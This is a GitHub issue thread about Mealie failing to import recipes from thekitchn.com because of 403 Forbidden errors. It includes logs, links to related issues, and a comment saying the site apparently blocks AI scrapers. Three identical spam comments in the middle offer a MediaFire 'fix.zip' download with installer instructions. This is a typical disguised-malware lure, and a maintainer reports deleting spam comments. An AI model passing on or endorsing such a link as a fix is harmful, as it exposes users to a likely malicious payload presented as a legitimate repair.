### ISSUE TITLE
[thekitchn] - 403 forbidden

### ISSUE THREAD

**Issue by ianepreston** [mealie-recipes/mealie#4091]
### First Check

- [X] I used the GitHub search to find a similar issue and didn't find it.
- [X] I have verified that this issue _is not_ related to the underlying library
[hhyrsev/recipe-scrapers](https://github.com/hhursev/recipe-scrapers) by **1)** checking
the [debugger](https://demo.mealie.io/g/home/r/create/debug) and data is returned, **2)**
verifying that there _are_ errors in the log related to application level code, or
**3)** verified that the site provides recipe data, or is otherwise supported by
[hhyrsev/recipe-scrapers](https://github.com/hhursev/recipe-scrapers)

- [X] This issue can be replicated on the demo site (https://demo.mealie.io/)

### Please provide 1-5 example URLs that are having errors

https://www.thekitchn.com/enchilada-casserole-263079
https://www.thekitchn.com/herby-french-lentil-salad-recipe-23201023

### Please provide your logs for the Mealie container `docker logs <container-id> > mealie.logs`

INFO     2024-08-24T13:49:01 - [127.0.0.1:38566] 200 OK "GET /api/app/about HTTP/1.1"
INFO     2024-08-24T13:49:01 - HTTP Request: GET https://www.thekitchn.com/enchilada-casserole-263079 "HTTP/1.1 403 Forbidden"
INFO     2024-08-24T13:49:01 - [192.168.15.5:0] 400 Bad Request "POST /api/recipes/create-url HTTP/1.1"

### Deployment

Docker (Linux)

**Comment by pem884** [comment]
I'm here for the same reason, figure it couldn't hurt to find the issues that I found before arriving here.

In this repo: #3404 
...and the above referenced issue directed me to one in the scraper's repo: https://github.com/hhursev/recipe-scrapers/issues/1148

Hope this is useful!

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Kuchenpirat** [comment]
Deleted spam comments

**Comment by death2all110** [comment]
This doesn't appear to be a mealie issue. but a scraper/website issue. It seems that the site is trying to prevent being scraped by AI and the scraper library mealie uses was caught in the crossfire.
